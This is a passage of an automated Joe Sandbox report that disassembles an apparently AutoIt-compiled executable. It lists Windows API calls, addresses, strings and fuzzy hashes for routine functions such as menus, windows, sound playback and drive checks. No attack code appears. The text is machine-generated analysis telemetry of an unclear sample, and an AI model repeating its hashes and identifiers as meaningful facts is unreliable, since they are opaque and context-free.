                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                    • API String ID: 3964851224-909552448
                    • Opcode ID: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                    • Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
                    • Opcode Fuzzy Hash: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                    • Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0043E2A0,00000010,?,Bad directive syntax error,0048F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0045F7C2
                    • LoadStringW.USER32(00000000,?,0043E2A0,00000010), ref: 0045F7C9
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                    • _wprintf.LIBCMT ref: 0045F7FC
                    • __swprintf.LIBCMT ref: 0045F81E
                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0045F88D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                    • API String ID: 1506413516-4153970271
                    • Opcode ID: b0a5f66eebad9f36124e6602567880734addc3d43cd627ae7dde5d3f4a6a6943
                    • Instruction ID: b323f88afb297f8589dfe01482fd0210897c7bceeb753686804773940a61526b
                    • Opcode Fuzzy Hash: b0a5f66eebad9f36124e6602567880734addc3d43cd627ae7dde5d3f4a6a6943
                    • Instruction Fuzzy Hash: 33215071904219BBCF11EF91CC0AEEE7739BF14309F04087BB515750A2EA39AA18DB59
                    APIs
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      • Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD
                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: SendString$_memmove
                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                    • API String ID: 2279737902-1007645807
                    • Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                    • Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
                    • Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                    • Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                    • String ID: 0.0.0.0
                    • API String ID: 208665112-3771769585
                    • Opcode ID: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
                    • Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
                    • Opcode Fuzzy Hash: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
                    • Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A
                    APIs
                    • timeGetTime.WINMM ref: 00464F7A
                      • Part of subcall function 0042049F: timeGetTime.WINMM(?,75A8B400,00410E7B), ref: 004204A3
                    • Sleep.KERNEL32(0000000A), ref: 00464FA6
                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
                    • SetActiveWindow.USER32 ref: 0046500B
                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
                    • Sleep.KERNEL32(000000FA), ref: 00465043
                    • IsWindow.USER32 ref: 0046504F
                    • EndDialog.USER32(00000000), ref: 00465060
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                    • String ID: BUTTON
                    • API String ID: 1194449130-3405671355
                    • Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                    • Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
                    • Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                    • Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F
                    APIs
                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                    • CoInitialize.OLE32(00000000), ref: 0046D5EA
                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0046D67D
                    • SHGetDesktopFolder.SHELL32(?), ref: 0046D691
                    • CoCreateInstance.OLE32(00492D7C,00000000,00000001,004B8C1C,?), ref: 0046D6DD
                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0046D74C
                    • CoTaskMemFree.OLE32(?,?), ref: 0046D7A4
                    • _memset.LIBCMT ref: 0046D7E1
                    • SHBrowseForFolderW.SHELL32(?), ref: 0046D81D
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0046D840
                    • CoTaskMemFree.OLE32(00000000), ref: 0046D847
                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0046D87E
                    • CoUninitialize.OLE32(00000001,00000000), ref: 0046D880
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                    • String ID:
                    • API String ID: 1246142700-0
                    • Opcode ID: 1febc7807772f56294efd1fd13851000f7df353c646d9fdc6f6b769e470cf38e
                    • Instruction ID: f865a34610966cb3ccb6f29414af5a3955dc884533e4df89e7e1a7976a3b9bcc
                    • Opcode Fuzzy Hash: 1febc7807772f56294efd1fd13851000f7df353c646d9fdc6f6b769e470cf38e
                    • Instruction Fuzzy Hash: 39B11B75A00109AFDB04DFA5C888DAEBBB9FF48314F10846AF909EB261DB34ED45CB55
                    APIs
                    • GetDlgItem.USER32(?,00000001), ref: 0045C283
                    • GetWindowRect.USER32(00000000,?), ref: 0045C295
                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
                    • GetDlgItem.USER32(?,00000002), ref: 0045C2FE
                    • GetWindowRect.USER32(00000000,?), ref: 0045C310
                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
                    • GetDlgItem.USER32(?,000003E9), ref: 0045C372
                    • GetWindowRect.USER32(00000000,?), ref: 0045C383
                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
                    • GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$ItemMoveRect$Invalidate
                    • String ID:
                    • API String ID: 3096461208-0
                    • Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                    • Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
                    • Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                    • Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14
                    APIs
                      • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
                    • KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
                    • DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
                    • DeleteObject.GDI32(00000000), ref: 0043BD1C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                    • String ID:
                    • API String ID: 641708696-0
                    • Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                    • Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
                    • Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                    • Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99
                    APIs
                      • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                    • GetSysColor.USER32(0000000F), ref: 004021D3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ColorLongWindow
                    • String ID:
                    • API String ID: 259745315-0
                    • Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                    • Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
                    • Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                    • Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69
                    APIs
                    • CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
                    • GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
                    • _wcscpy.LIBCMT ref: 0046A9FF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: BuffCharDriveLowerType_wcscpy
                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                    • API String ID: 2820617543-1000479233
                    • Opcode ID: 556639d0dcd09af84e262d548350a2ad112727df3badb39c837963bed888a9a7
                    • Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
                    • Opcode Fuzzy Hash: 556639d0dcd09af84e262d548350a2ad112727df3badb39c837963bed888a9a7
                    • Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B
                    APIs
                    • _memset.LIBCMT ref: 0048716A
                    • CreateMenu.USER32 ref: 00487185
                    • SetMenu.USER32(?,00000000), ref: 00487194
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
                    • IsMenu.USER32(?), ref: 00487237
                    • CreatePopupMenu.USER32 ref: 00487241
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
                    • DrawMenuBar.USER32 ref: 00487276
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                    • String ID: 0$F
                    • API String ID: 176399719-3044882817
                    • Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                    • Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
                    • Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                    • Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98
                    APIs
                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
                    • CreateCompatibleDC.GDI32(00000000), ref: 00487565
                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
                    • SelectObject.GDI32(00000000,00000000), ref: 00487580
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
                    • DeleteDC.GDI32(00000000), ref: 00487594
                    • GetWindowLongW.USER32(?,000000EC), ref: 0048759E
                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                    • String ID: static
                    • API String ID: 2559357485-2160076837
                    • Opcode ID: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                    • Instruction ID: 1923f87f84a105141cc97cd4dfb73f9ea5de9f9edaf5dec82e4c1ac095da0f9d
                    • Opcode Fuzzy Hash: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                    • Instruction Fuzzy Hash: FA316D72104214BBDF11AF64DC08FDF3BA9FF09364F210A29FA15A61A0D739D815DBA8
                    APIs
                    • _memset.LIBCMT ref: 00426E3E
                      • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                    • __gmtime64_s.LIBCMT ref: 00426ED7
                    • __gmtime64_s.LIBCMT ref: 00426F0D
                    • __gmtime64_s.LIBCMT ref: 00426F2A
                    • __allrem.LIBCMT ref: 00426F80
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
                    • __allrem.LIBCMT ref: 00426FB3
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
                    • __allrem.LIBCMT ref: 00426FE8
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
                    • __invoke_watson.LIBCMT ref: 00427077
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                    • Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                    • Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98
                    APIs
                    • _memset.LIBCMT ref: 00462542
                    • GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
                    • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
                    • Sleep.KERNEL32(000001F4), ref: 004625EB
                    • GetMenuItemCount.USER32(?), ref: 0046262F
                    • GetMenuItemID.USER32(?,00000000), ref: 0046264B
                    • GetMenuItemID.USER32(?,-00000001), ref: 00462675
                    • GetMenuItemID.USER32(?,?), ref: 004626BA
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                    • String ID:
                    • API String ID: 4176008265-0
                    • Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                    • Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
                    • Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                    • Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A
                    APIs
